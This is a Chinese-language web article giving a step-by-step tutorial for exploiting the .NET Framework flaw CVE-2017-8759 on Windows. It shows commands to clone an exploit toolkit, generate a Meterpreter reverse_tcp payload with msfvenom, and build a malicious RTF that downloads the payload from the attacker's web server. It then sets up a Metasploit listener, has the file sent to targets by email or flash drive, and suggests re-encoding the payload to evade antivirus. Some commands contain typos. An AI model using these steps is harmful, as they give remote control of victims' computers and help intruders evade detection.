当前位置:首页 > 技术文章 > 安全攻防 > 系统安全

漏洞利用:CVE-2017-8759来利用几乎任何Windows系统

发布时间:2017-12-06 14:01:19 作者:匿名 来源:网络 点击量:

如何使用CVE-2017-8759来利用几乎任何windows系统

 
2017年9月12日,FireEye透露,他们发现了利用CVE-2017-7859的恶意软件。此恶意软件利用.NET Framework中的一个漏洞,使攻击者能够在目标系统(RCE)上执行远程代码。远程代码执行意味着攻击者可以在远程系统上运行自己的代码并控制或拥有代码。
 
这个漏洞的好处在于它几乎适用于所有的windows系统。
 
漏洞利用嵌入命令将目标系统连接到我们系统上的Web服务器。在那里,命令将得到我们的有效载荷(windows/ meterpreter / reverse_tcp)并把它放在目标上。然后,有效负载将连接到我们在Metasploit(multi / handler)上启动的侦听器。
 
我们将使用Metasploit来完成这个漏洞的一部分,所以如果你不熟悉Metasploit,请查看我的Metasploit Basics系列。
 
在本教程中,我将使用文件名“gotcha”作为.rtf文件,.exe和.txt文件。我希望这不是混乱。他们都是独立的和不同的文件,具有独特的扩展。
 
步骤#1从Github.com下载
 
第一步是启动kali,并开放一个终端。
 
 
 
当您打开终端时,我们将首先下载一个方便的python脚本来利用CVE-2017-8759。
 
kali> git clone https://github.com/bhdresh/CVE-2017-8759
 
 
 
一旦下载成功,我们必须将目录切换到新的CVE-2017-8759目录
 
kali> cd CVE-2017-8759
 
现在,在那个目录上做一个长列表。
 
kali> ls -l
 
 
正如你所看到的,我们有一个cve-2017-8759_toolkit.py和一个README.md文件。显然,一个是python脚本和其他指令。
 
在我们做任何事情之前,我们需要给自己许可使用chmod来执行文件。
 
kali> chmod 755 cve-2017-8759_toolkit.py
 
现在我们有权执行这个文件,让我们来看一下README的一些关于如何使用这个脚本的帮助。
 
kali>more README.md
 
您可以在下面的脚本中看到基本的开关。
 

 
 
注意在上面的截图中,示例命令。我们将使用与此示例几乎相同的命令。
 
 
 
步骤2:为我们的Web服务器检索的代码创建一个Meterpreter负载
 
在我们开始使用python脚本之前,我们首先创建一个有效载荷,我们将最终放置在连接到我们的系统的目标上。我们将使用Metasploit的msfvenom来创建我们的有效载荷)。确保在LHOST中使用系统的IP地址。我们将把有效负载放在/ tmp目录中并命名为gotcha.exe
 
kali> msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.1.101 LPORT = 6996 -f exe> /tmp/gotcha.exe
 
 
 
第3步:创建我们的恶意RTF文件
 
接下来,我们需要创建恶意的.rtf文件。类似于README.md文件中的示例命令,除了我们将使用我们的IP地址并创建一个名为“Gotcha.rtf”的文件。
 
kali> python cve-2017-8759_toolkit.py -M gen -w Gotcha.rtf -u http://192.168.1.101/gotcha.txt
 
 
当我们现在在目录上做一个长列表时,我们可以看到已经创建了恶意的.rtf文件。
 
 
步骤4:在我们的Web服务器上托管有效负载
 
 
接下来,我们需要在Web服务器上托管该有效负载。我们的脚本使我们能够设置托管有效载荷的Web服务器。当攻击被执行时,它将检索这个有效载荷并将其放置在目标系统上。
 
kali> python cve-2017-8759_toolkit.py -M exp -e http://192.168.1.101/gotcha.exe -l /tmp/gotcha.exe
 
 
当我们点击ENTER时,脚本会启动恶意软件将连接到的端口80上的Web服务器,并传递我们使用msfvenom创建的有效内容。
 
步骤#5:打开一个多处理器来监听连接
 
现在,我们需要在我们的系统上打开一个监听器,以便在目标系统上执行时连接到meterpreter负载。
 
kali> msfconsole
 
 
msf > use mult/handler
 
msf > set PAYLOAD windows/meterpreter/reverse_tcp
 
msf > set LHOST 192.68.1.101
 
msf > set LPORT 6996
 
步骤#6:将恶意.rtf发送到目标
 
最后,我们需要通过电子邮件,DropBox,闪存等恶意RTF文件发送到目标。当目标打开文件时,rtf中的恶意代码将连接到端口80上的Web服务器,获取我们在msfvenom中创建的有效载荷,并将有效负载连接到我们的Metasploit监听器,并给我们一个meterpreter提示符!
 
 
现在我们拥有这个系统!
 
在这种情况下,一个可能的问题当然就是系统已经被修补了。另一个可能的麻烦是AV软件检测我们的有效载荷。如果是这种情况,请尝试使用OWASP-ZSC重新编码有效负载。
 

本文链接:http://www.topjishu.net/article/14.html,如有转载,请注明出处!


关键词:漏洞利用,CVE-2017-8759,Windows系统,漏洞


发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表